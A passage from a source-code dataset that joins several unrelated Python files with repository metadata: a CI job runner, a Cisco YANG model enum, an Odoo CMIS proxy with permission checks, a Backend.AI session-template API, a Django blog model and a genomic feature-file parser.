'uuid': job['uuid']
})
if cursor.rowcount == 0:
print 'My job got stolen (id %s)!' % job['uuid']
continue
cursor.execute('commit;')
start_time = time.time()
rc, job_id = process(job)
end_time = time.time()
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('update jobs set processed=1, outcome=%(outcome)s, '
'log_url=%(log_url)s '
'where uuid=%(uuid)s;',
{
'outcome': rc,
'log_url': ('http://molokai.stillhq.com/lab/logs/%s/'
% job_id),
'uuid': job['uuid']
})
cursor.execute('commit;')
cursor.execute('select * from jobs where event_uuid=%(event_uuid)s;',
{'event_uuid': job['event_uuid']})
report = []
unrun = 0
for job in cursor:
outcome = ''
if str(job['outcome']) == '0':
outcome = 'passed'
elif job['outcome']:
outcome = 'failed'
else:
unrun += 1
outcome = 'not yet run'
logs = ''
if job['log_url']:
logs = ', logs at %s' % job['log_url']
report.append('%s on %s %s%s' %(job['branch'], job['distro'],
outcome, logs))
comment = 'Tests run on %s:' % job['sha']
for r in report:
comment += ('\n %s' % r)
print 'Unrun: %d' % unrun
print comment
if unrun == 0:
github_comment(job['issue_url'], comment)
#if rc != 0:
# print 'Failed test run, stopping to debug'
# sys.exit(1)
if job['type'] == 'manual':
print 'Manual job, stopping for user to operate'
sys.exit(1)
if __name__ == '__main__':
main()
|
apache-2.0
| 634,645,749,023,385,500
| 29.902703
| 80
| 0.509183
| false
| 3.783587
| false
| false
| false
|
abhikeshav/ydk-py
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_locald_cfg.py
|
1
|
1133
|
""" Cisco_IOS_XR_aaa_locald_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-locald package configuration.
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-lib\-cfg
module with configuration data.
Copyright (c) 2013\-2015 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class AaaLocaldTaskClassEnum(Enum):
"""
AaaLocaldTaskClassEnum
Aaa locald task class
.. data:: READ = 0
Permits read operation for a Task ID
.. data:: WRITE = 1
Permits write operation for a Task ID
.. data:: EXECUTE = 2
Permits execute operation for a Task ID
.. data:: DEBUG = 3
Permits debug operation for a Task ID
"""
READ = 0
WRITE = 1
EXECUTE = 2
DEBUG = 3
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_locald_cfg as meta
return meta._meta_table['AaaLocaldTaskClassEnum']
|
apache-2.0
| -94,935,661,741,093,040
| 16.166667
| 86
| 0.677846
| false
| 3.529595
| false
| false
| false
|
acsone/alfodoo
|
cmis_web_proxy/controllers/cmis.py
|
1
|
18684
|
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import json
import logging
import urlparse
import werkzeug
from odoo import _, http
from odoo.http import request
from odoo.exceptions import AccessError
from odoo.addons.web.controllers import main
_logger = logging.getLogger(__name__)
try:
import requests
except ImportError:
_logger.debug('Cannot `import requests`.')
CMIS_PROXY_PATH = '/cmis/1.1/browser'
READ_ACCESS_CMIS_ACTIONS = set([
"query",
])
WRITE_ACCESS_CMIS_ACTIONS = set([
"createRelationship",
# "createPolicy", method at repository level: not supported
# "createItem", method at repository level: not supported
"bulkUpdate",
# "createType", method at repository level: not supported
# "updateType", method at repository level: not supported
"createDocument",
"createFolder",
"createDocumentFromSource",
# "createPolicy", method at repository level: not supported
"update",
"setContent",
"checkOut",
"cancelCheckOut",
"checkIn",
# "applyPolicy", method at repository level: not supported
# "applyACL", method at repository level: not supported
])
UNLINK_ACCESS_CMIS_ACTIONS = set([
"delete",
"deleteContent",
"removeObjectFromFolder",
# "removePolicy", method at repository level: not supported
# "deleteType", method at repository level: not supported
])
READ_ACCESS_ALLOWABLE_ACTIONS = set([
"canGetDescendants",
"canGetChildren",
"canGetFolderParent",
"canGetObjectParents",
"canGetProperties",
"canGetContentStream",
"canGetAllVersions",
"canGetObjectRelationships",
"canGetAppliedPolicies",
"canGetACL",
])
WRITE_ACCESS_ALLOWABLE_ACTIONS = set([
"canCreateDocument",
"canCreateFolder",
# "canCreatePolicy",
"canCreateRelationship",
"canUpdateProperties",
"canMoveObject",
"canSetContentStream",
"canAddObjectToFolder",
"canCheckOut",
"canCancelCheckOut",
"canCheckIn",
# "canApplyPolicy",
# "canApplyACL",
])
UNLINK_ACCESS_ALLOWABLE_ACTIONS = set([
"canRemoveObjectFromFolder",
"canDeleteObject",
"canDeleteContentStream",
"canDeleteTree",
# "canRemovePolicy",
])
CMSI_ACTIONS_OPERATION_MAP = {}
for a in READ_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'read'
for a in WRITE_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'write'
for a in UNLINK_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'unlink'
def gen_dict_extract(key, var):
""" This method is used to recusrively find into a json structure (dict)
all values of a given key
credits: http://stackoverflow.com/questions/9807634/
find-all-occurences-of-a-key-in-nested-python-dictionaries-and-lists
"""
if hasattr(var, 'items'):
for k, v in var.items():
if k == key:
yield v
if isinstance(v, dict):
for result in gen_dict_extract(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in gen_dict_extract(key, d):
yield result
class CmisProxy(http.Controller):
@property
def _cmis_proxy_base_url(self):
return urlparse.urljoin(request.httprequest.host_url, CMIS_PROXY_PATH)
@classmethod
def _clean_url_in_dict(cls, values, original, new):
"""Replace all occurences of the CMIS container url in the json
returned by a call to the CMIS container by the one of the proxy"""
if original.endswith('/'):
original = original[:-1]
for k, v in values.items():
if isinstance(v, dict):
cls._clean_url_in_dict(v, original, new)
elif hasattr(v, 'replace'):
values[k] = v.replace(original, new)
def _check_access_operation(self, model_inst, operation):
"""
Check if the user has the appropriate rights to perform the operation.
The default is to check the access rights and access rules on the
model instance. This behaviour can be adapted by defining the method
''_check_cmis_access_operation'' on the model.
::
@api.multi
def _check_cmis_access_operation(self, operation, field_name=None):
if my_true_condition:
return 'allow'
if my_false_condition:
return 'deny'
return 'default'
The expected result must be in ('allow', 'deny', 'default').
* allow: Access granted
* deny: Access Denied
* default: The current method will check the access rights and access
rules
"""
try:
if hasattr(model_inst, '_check_cmis_access_operation'):
res = model_inst._check_cmis_access_operation(operation, None)
if res not in ('allow', 'deny', 'default'):
raise ValueError("_check_cmis_access_operation result "
"must be in ('allow', 'deny', 'default')")
if res != 'default':
return res == 'allow'
model_inst.check_access_rights(operation)
model_inst.check_access_rule(operation)
except AccessError:
return False
return True
def _apply_permissions_mapping(self, value, headers, proxy_info,
model_inst=None):
"""This method modify the defined allowableActions returned by the
CMIS container to apply the Odoo operation policy defined of the
model instance
"""
if not model_inst:
return
all_allowable_actions = [aa for aa in gen_dict_extract(
'allowableActions', value)]
if not all_allowable_actions:
return
can_read = self._check_access_operation(model_inst, 'read')
can_write = self._check_access_operation(model_inst, 'write')
can_unlink = self._check_access_operation(model_inst, 'unlink')
for allowable_actions in all_allowable_actions:
for action, val in allowable_actions.items():
allowed = False
if action in READ_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_read and val
elif action in WRITE_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_write and val
elif action in UNLINK_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_unlink and val
allowable_actions[action] = allowed
def _sanitize_headers(self, headers):
for key in headers:
if key.lower() == 'transfer-encoding':
headers[key] = None
def _prepare_json_response(self, value, headers, proxy_info,
model_inst=None):
cmis_location = proxy_info['location']
self._clean_url_in_dict(value,
urlparse.urlparse(cmis_location).geturl(),
proxy_info['proxy_location'])
if proxy_info['apply_odoo_security']:
self._apply_permissions_mapping(
value, headers, proxy_info, model_inst)
self._sanitize_headers(headers)
response = werkzeug.Response(
json.dumps(value), mimetype='application/json',
headers=headers)
return response
@classmethod
def _get_redirect_url(cls, proxy_info, url_path):
cmis_location = proxy_info['location']
return urlparse.urljoin(cmis_location, url_path)
def _forward_get_file(self, url, proxy_info, params):
"""Method called to retrieved the content associated to a CMIS object.
The content is streamed between the CMIS container and the caller to
avoid to suck the server memory
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
r = requests.get(
url, params=params,
stream=True,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
headers = dict(r.headers.items())
self._sanitize_headers(headers)
return werkzeug.Response(
r, headers=headers,
direct_passthrough=True)
def _forward_get(self, url_path, proxy_info, model_inst, params):
"""
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
url = self._get_redirect_url(proxy_info, url_path)
if params.get('cmisselector') == 'content':
return self._forward_get_file(url, proxy_info, params)
r = requests.get(
url, params=params,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _forward_post(self, url_path, proxy_info, model_inst, params):
"""The CMIS Browser binding is designed to be queried from the browser
Therefore, the parameters in a POST are expected to be submitted as
HTTP multipart forms. Therefore each parameter in the request is
forwarded as a part of a multipart/form-data.
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
files = {}
if 'content' in params:
# we are in a mulitpart form data'
content = params.pop('content')
files['content'] = (
content.filename,
content.stream,
content.mimetype
)
for k, v in params.items():
# no filename for parts dedicated to HTTP Form data
files[k] = (None, v, 'text/plain;charset=utf-8')
url = self._get_redirect_url(proxy_info, url_path)
r = requests.post(url, files=files,
auth=(
proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _check_provided_token(self, cmis_path, proxy_info, params):
""" Check that a token is present in the request or in the http
headers and both are equal.
:return: the token value if checks are OK, False otherwise.
"""
token = request.httprequest.headers.get('Authorization')
if token:
token = token.replace('Bearer', '').strip()
else:
token = (params.get('token') or '').strip()
if 'token' in params:
params.pop('token')
if not token:
_logger.info("Tokens not provided in headers or request params")
return False
return token
def _decode_token(self, cmis_path, proxy_info, params,
token):
"""Return the Odoo object referenced by the token and the field name
for which the query is done
:return: a tuple (Odoo model instance if exists and user has at least
read access or False, field_name)
"""
token = json.loads(token)
model_name = token.get('model')
false_result = False, False
res_id = token.get('res_id')
if model_name not in request.env:
_logger.info("Invalid model name in token (%s)", model_name)
return false_result
model = request.env[model_name]
if not model.check_access_rights('read', raise_exception=False):
_logger.info("User has no read access on model %s", model_name)
return false_result
model_inst = model.browse(res_id)
if not model_inst.exists():
_logger.info("The referenced model doesn't exist or the user has "
"no read access (%s, %s)", model, res_id)
return false_result
return model_inst, token.get('field_name')
def _check_cmis_content_access(self, cmis_path, proxy_info, params,
model_inst, field_name):
"""Check that the CMIS content referenced into the request is the
same as or a child of the one linked to the odoo model instance.
:return: True if check is Ok False otherwise
"""
token_cmis_objectid = getattr(model_inst, field_name)
if not token_cmis_objectid:
_logger.info("The referenced model doesn't reference a CMIS "
"content (%s, %s)", model_inst._name, model_inst.id)
return False
request_cmis_objectid = params.get('renderedObjectId')
if request_cmis_objectid:
# If the proxy is called to render a cmis content, we need to check
# the original objectId since the one provided by the rendition
# service has no paths
params.pop('renderedObjectId')
else:
request_cmis_objectid = params.get('objectId')
repo = proxy_info['cmis_repository']
if not request_cmis_objectid:
# get the CMIS object id from cmis_path
cmis_content = repo.getObjectByPath(cmis_path)
request_cmis_objectid = cmis_content.getObjectId()
if request_cmis_objectid == token_cmis_objectid:
# the operation is on the CMIS content linked to the Odoo model
# instance
return True
cmis_object = repo.getObject(request_cmis_objectid)
# We can't use a CMIS query to check if a node is in the expected
# tree since the indexation is asynchronous. In place of a simple
# query we check if one of the paths of the node linked to the Odoo
# content instance is in one of the node paths of the requested
# cmis_object
child_paths = cmis_object.getPaths()
parent_paths = repo.getObject(token_cmis_objectid).getPaths()
for p in parent_paths:
for cp in child_paths:
if p in cp:
return True
_logger.info("%s is not a child of %s", request_cmis_objectid,
token_cmis_objectid)
return False
def _check_content_action_access(self, cmis_path, proxy_info, params,
model_inst):
"""Check that the User has de required Permissioon on the Odoo model
instance to di the expected CMIS action
"""
cmisaction = params.get('cmisaction')
if not cmisaction:
return True
operation = CMSI_ACTIONS_OPERATION_MAP.get(cmisaction)
if not operation:
_logger.info("CMIS action %s not supported", cmisaction)
return False
if not self._check_access_operation(model_inst, operation):
_logger.info("User don't have the access right for operation %s "
"on %s to execute the CMIS action %s", operation,
model_inst.name_get()[0][1], cmisaction)
return False
return True
def _check_access(self, cmis_path, proxy_info, params):
"""This method check that the user can access to the requested CMIS
content.
Security checks applied when the proxy mode is activated,:
1. Requests from the client must provide a token (in the header or
as param of the request).
If no security token is provided in this case, the access is denied.
2. The Odoo object referenced by the token (the token is build as
'model.name' + '_' + 'instance_id') must exist.
3. The user must have read access to the object referenced by the token
4. If a cmis_path or object_id is provided by the request, the
referenced CMIS content must be child of or the node referenced by
the Odoo object from the token (or equal)
5. If a cmisaction is provided by the request, a check is done to
ensure that the user has the required privileges in Odoo
"""
# check token conformity
token = self._check_provided_token(cmis_path, proxy_info, params)
if not token:
raise AccessError(_("Bad request"))
# check access to object from token
model_inst, field_name = self._decode_token(
cmis_path, proxy_info, params, token)
if not model_inst:
raise AccessError(_("Bad request"))
# check if the CMIS object in the request is the the one referenced on
# model_inst or a child of this one
if not cmis_path and 'objectId' not in params:
# The request is not for an identified content
return model_inst
if not self._check_cmis_content_access(
cmis_path, proxy_info, params, model_inst, field_name):
raise AccessError(_("Bad request"))
if not self._check_content_action_access(
cmis_path, proxy_info, params, model_inst):
raise AccessError(_("Bad request"))
return model_inst
@http.route([
CMIS_PROXY_PATH + '/<int:backend_id>',
CMIS_PROXY_PATH + '/<int:backend_id>/<path:cmis_path>'
], type='http', auth="user", csrf=False, methods=['GET', 'POST'])
@main.serialize_exception
def call_cmis_services(self, backend_id, cmis_path="", **kwargs):
"""Call at the root of the CMIS repository. These calls are for
requesting the global services provided by the CMIS Container
"""
# proxy_info are informations available into the cache without loading
# the cmis.backend from the database
proxy_info = request.env['cmis.backend'].get_proxy_info_by_id(
backend_id)
method = request.httprequest.method
model_inst = False
if proxy_info.get('apply_odoo_security'):
model_inst = self._check_access(cmis_path, proxy_info, kwargs)
if method not in ['GET', 'POST']:
raise AccessError(
_("The HTTP METHOD %s is not supported by CMIS") % method)
if method == 'GET':
method = self._forward_get
elif method == 'POST':
method = self._forward_post
return method(cmis_path, proxy_info, model_inst, kwargs)
|
agpl-3.0
| 6,017,278,269,581,853,000
| 39.267241
| 79
| 0.596286
| false
| 4.189238
| false
| false
| false
|
lablup/backend.ai-manager
|
src/ai/backend/manager/api/session_template.py
|
1
|
14992
|
import json
import logging
from typing import (
Any,
List,
Mapping,
TYPE_CHECKING,
Tuple,
)
import uuid
from aiohttp import web
import aiohttp_cors
import sqlalchemy as sa
import trafaret as t
import yaml
from ai.backend.common import validators as tx
from ai.backend.common.logging import BraceStyleAdapter
from ..models import (
association_groups_users as agus, domains,
groups, session_templates, keypairs, users, UserRole,
query_accessible_session_templates, TemplateType,
)
from ..models.session_template import check_task_template
from .auth import auth_required
from .exceptions import InvalidAPIParameters, TaskTemplateNotFound
from .manager import READ_ALLOWED, server_status_required
from .types import CORSOptions, Iterable, WebMiddleware
from .utils import check_api_params, get_access_key_scopes
if TYPE_CHECKING:
from .context import RootContext
log = BraceStyleAdapter(logging.getLogger(__name__))
@server_status_required(READ_ALLOWED)
@auth_required
@check_api_params(t.Dict(
{
tx.AliasedKey(['group', 'groupName', 'group_name'], default='default'): t.String,
tx.AliasedKey(['domain', 'domainName', 'domain_name'], default='default'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
t.Key('payload'): t.String
}
))
async def create(request: web.Request, params: Any) -> web.Response:
if params['domain'] is None:
params['domain'] = request['user']['domain_name']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
requester_uuid = request['user']['uuid']
log.info(
'SESSION_TEMPLATE.CREATE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
user_uuid = request['user']['uuid']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
if requester_access_key != owner_access_key:
# Admin or superadmin is creating sessions for another user.
# The check for admin privileges is already done in get_access_key_scope().
query = (
sa.select([keypairs.c.user, users.c.role, users.c.domain_name])
.select_from(sa.join(keypairs, users, keypairs.c.user == users.c.uuid))
.where(keypairs.c.access_key == owner_access_key)
)
result = await conn.execute(query)
row = result.first()
owner_domain = row['domain_name']
owner_uuid = row['user']
owner_role = row['role']
else:
# Normal case when the user is creating her/his own session.
owner_domain = request['user']['domain_name']
owner_uuid = requester_uuid
owner_role = UserRole.USER
query = (
sa.select([domains.c.name])
.select_from(domains)
.where(
(domains.c.name == owner_domain) &
(domains.c.is_active)
)
)
qresult = await conn.execute(query)
domain_name = qresult.scalar()
if domain_name is None:
raise InvalidAPIParameters('Invalid domain')
if owner_role == UserRole.SUPERADMIN:
# superadmin can spawn container in any designated domain/group.
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == params['domain']) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
elif owner_role == UserRole.ADMIN:
# domain-admin can spawn container in any group in the same domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to the owner's domain.")
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
else:
# normal users can spawn containers in their group and domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to your domain.")
query = (
sa.select([agus.c.group_id])
.select_from(agus.join(groups, agus.c.group_id == groups.c.id))
.where(
(agus.c.user_id == owner_uuid) &
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
if group_id is None:
raise InvalidAPIParameters('Invalid group')
log.debug('Params: {0}', params)
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
try:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
template_id = uuid.uuid4().hex
resp = {
'id': template_id,
'user': user_uuid.hex,
}
query = session_templates.insert().values({
'id': template_id,
'domain_name': params['domain'],
'group_id': group_id,
'user_uuid': user_uuid,
'name': template_data['metadata']['name'],
'template': template_data,
'type': TemplateType.TASK,
})
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('all', default=False): t.ToBool,
tx.AliasedKey(['group_id', 'groupId'], default=None): tx.UUID | t.String | t.Null,
}),
)
async def list_template(request: web.Request, params: Any) -> web.Response:
resp = []
access_key = request['keypair']['access_key']
domain_name = request['user']['domain_name']
user_role = request['user']['role']
user_uuid = request['user']['uuid']
log.info('SESSION_TEMPLATE.LIST (ak:{})', access_key)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
entries: List[Mapping[str, Any]]
if request['is_superadmin'] and params['all']:
j = (
session_templates
.join(users, session_templates.c.user_uuid == users.c.uuid, isouter=True)
.join(groups, session_templates.c.group_id == groups.c.id, isouter=True)
)
query = (
sa.select([session_templates, users.c.email, groups.c.name], use_labels=True)
.select_from(j)
.where(
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.execute(query)
entries = []
for row in result:
is_owner = True if row.session_templates_user == user_uuid else False
entries.append({
'name': row.session_templates_name,
'id': row.session_templates_id,
'created_at': row.session_templates_created_at,
'is_owner': is_owner,
'user': (str(row.session_templates_user_uuid)
if row.session_templates_user_uuid else None),
'group': (str(row.session_templates_group_id)
if row.session_templates_group_id else None),
'user_email': row.users_email,
'group_name': row.groups_name,
})
else:
extra_conds = None
if params['group_id'] is not None:
extra_conds = ((session_templates.c.group_id == params['group_id']))
entries = await query_accessible_session_templates(
conn,
user_uuid,
TemplateType.TASK,
user_role=user_role,
domain_name=domain_name,
allowed_types=['user', 'group'],
extra_conds=extra_conds,
)
for entry in entries:
resp.append({
'name': entry['name'],
'id': entry['id'].hex,
'created_at': str(entry['created_at']),
'is_owner': entry['is_owner'],
'user': str(entry['user']),
'group': str(entry['group']),
'user_email': entry['user_email'],
'group_name': entry['group_name'],
'type': 'user' if entry['user'] is not None else 'group',
})
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('format', default='yaml'): t.Null | t.Enum('yaml', 'json'),
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def get(request: web.Request, params: Any) -> web.Response:
if params['format'] not in ['yaml', 'json']:
raise InvalidAPIParameters('format should be "yaml" or "json"')
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.GET (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
template_id = request.match_info['template_id']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.template])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
template = await conn.scalar(query)
if not template:
raise TaskTemplateNotFound
template = json.loads(template)
if params['format'] == 'yaml':
body = yaml.dump(template)
return web.Response(text=body, content_type='text/yaml')
else:
return web.json_response(template)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('payload'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def put(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.PUT (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
query = (
sa.update(session_templates)
.values(template=template_data, name=template_data['metadata']['name'])
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def delete(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.DELETE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*'
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
query = (
sa.update(session_templates)
.values(is_active=False)
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
async def init(app: web.Application) -> None:
pass
async def shutdown(app: web.Application) -> None:
pass
def create_app(default_cors_options: CORSOptions) -> Tuple[web.Application, Iterable[WebMiddleware]]:
app = web.Application()
app.on_startup.append(init)
app.on_shutdown.append(shutdown)
app['api_versions'] = (4, 5)
app['prefix'] = 'template/session'
cors = aiohttp_cors.setup(app, defaults=default_cors_options)
cors.add(app.router.add_route('POST', '', create))
cors.add(app.router.add_route('GET', '', list_template))
template_resource = cors.add(app.router.add_resource(r'/{template_id}'))
cors.add(template_resource.add_route('GET', get))
cors.add(template_resource.add_route('PUT', put))
cors.add(template_resource.add_route('DELETE', delete))
return app, []
|
lgpl-3.0
| -2,623,418,009,516,440,000
| 36.668342
| 101
| 0.566169
| false
| 3.926663
| false
| false
| false
|
domain51/d51.django.apps.blogs
|
d51/django/apps/blogs/models.py
|
1
|
1309
|
from django.db import models
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
class RichTextField(models.TextField):
pass
class Post(models.Model):
internal_title = models.CharField(max_length=255)
display_title = models.CharField(null=True, blank=True, max_length=255)
summary = RichTextField()
content = RichTextField()
meta_keywords = models.CharField(null=True, blank=True, max_length=255)
slug = models.SlugField(unique=True)
author = models.ForeignKey(User, blank=True, null=True)
published = models.DateTimeField()
add_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
link = models.CharField(blank=True, null=True, max_length=200)
@property
def title(self):
return self.display_title or self.internal_title
def get_absolute_url(self):
return reverse('post-detail', kwargs={
'year':self.published.year,
'month':self.published.strftime('%b'),
'day':self.published.day,
'slug':self.slug,
})
def __unicode__(self):
return self.title
class Meta:
ordering = ['-published',]
verbose_name = 'blog post'
verbose_name_plural = 'blog posts'
|
gpl-3.0
| -3,552,080,607,034,685,400
| 29.44186
| 75
| 0.663866
| false
| 3.895833
| false
| false
| false
|
fls-bioinformatics-core/RnaChipIntegrator
|
rnachipintegrator/Features.py
|
1
|
19026
|
#!/bin/env python
#
# Features.py: classes for handling feature data
# Copyright (C) University of Manchester 2011-2019 Peter Briggs, Leo Zeef
# & Ian Donaldson
#
"""
Features.py
Classes for handling feature data.
"""
import logging
import io
from .distances import closestDistanceToRegion
from .utils import make_errline
class FeatureSet(object):
"""Class for storing a set of features
RNA-seq features consists of genes/transcripts/isomers, which
are stored individually in Feature objects. This class is a
container for a collection of Feature objects and provides
methods to operate on the collection, by creating subsets by
filtering, and sorting the features based on various criteria.
"""
def __init__(self,features_file=None,features_list=None):
"""Create a new FeatureSet instance
Raises an exception if there are errors in the input file data
(non-numeric fields for start/end positions, end positions
occurring before start positions, or illegal strand values).
Arguments:
features_file (str): (optional) the name of an input
file to read the feature data from
features_list (list): (optional) list of Feature objects
to populate the FeatureSet with
"""
self.features = []
self.source_file = None
if features_file:
self.loadFeaturesFromFile(features_file)
elif features_list:
for feature in features_list:
self.addFeature(feature)
def loadFeaturesFromFile(self,features_file):
"""Read features from a file and populate the object
Arguments:
features_file: the name of the input file to read features from.
"""
# Local flags etc
line_index = 0
critical_error = False
# Read in data from file
with io.open(features_file,'rt') as fp:
for line in fp:
# Increment index
line_index += 1
# Skip lines starting with #
if line.startswith('#'):
logging.debug("Feature file: skipped line: %s" %
line.strip())
continue
# Lines are tab-delimited and have at least 5 columns:
# ID chr start end strand
items = line.strip().split('\t')
if len(items) < 5:
logging.warning("Feature file: skipped line: %s" %
line.strip())
logging.warning("Insufficient number of fields (%d)" %
len(items))
continue
# Check line is valid i.e. start and stop should be
# numbers, strand should be + or -
problem_fields = []
if not items[2].isdigit():
problem_fields.append(2)
if not items[3].isdigit():
problem_fields.append(3)
if not (items[4] == '+' or items[4] == '-'):
problem_fields.append(4)
if problem_fields:
# If this is the first line then assume it's a header
# and ignore
if line_index == 1:
logging.warning("%s: first line ignored as header: "
"%s" % (features_file,line.strip()))
else:
# Indicate problem field(s)
logging.error("%s: critical error line %d: bad "
"values:" % (features_file,line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),
problem_fields))
# This is a critical error: update flag
critical_error = True
# Continue to next line
continue
elif int(items[2]) >= int(items[3]):
# Start position is same or higher than end
logging.error("%s: critical error line %d: 'end' comes "
"before 'start':" % (features_file,
line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),(2,3)))
# This is a critical error: update flag but continue
# reading
critical_error = True
continue
# Store in a new Feature object
feature = Feature(items[0],
items[1],
items[2],
items[3],
items[4],
source_file=features_file)
# Additional flag
if len(items) >= 6:
# Is column 6 a flag?
try:
flag_value = int(items[5])
if flag_value != 0 and flag_value != 1:
flag_value = None
except ValueError:
flag_value = None
# Store value
feature.flag = flag_value
# Store data
self.features.append(feature)
# Deal with postponed critical errors
if critical_error:
raise Exception("Critical error(s) in '%s'" % features_file)
# Store the source file
self.source_file = features_file
# Return a reference to this object
return self
def addFeature(self,feature):
"""Append a feature to the FeatureSet object
Arguments:
feature: a Feature instance.
"""
self.features.append(feature)
def filterByChr(self,matchChr):
"""Return a subset of features filtered by specified chromosome name
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.chrom == matchChr:
feature_subset.addFeature(feature)
return feature_subset
def filterByStrand(self,matchStrand):
"""Return a subset of features filtered by specified strand
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.strand == matchStrand:
feature_subset.addFeature(feature)
return feature_subset
def filterByFlag(self,matchFlag):
"""Return a subset of features filtered by flag value
Returns a new FeatureSet object containing only the features from
the current object which matches the specified criteria.
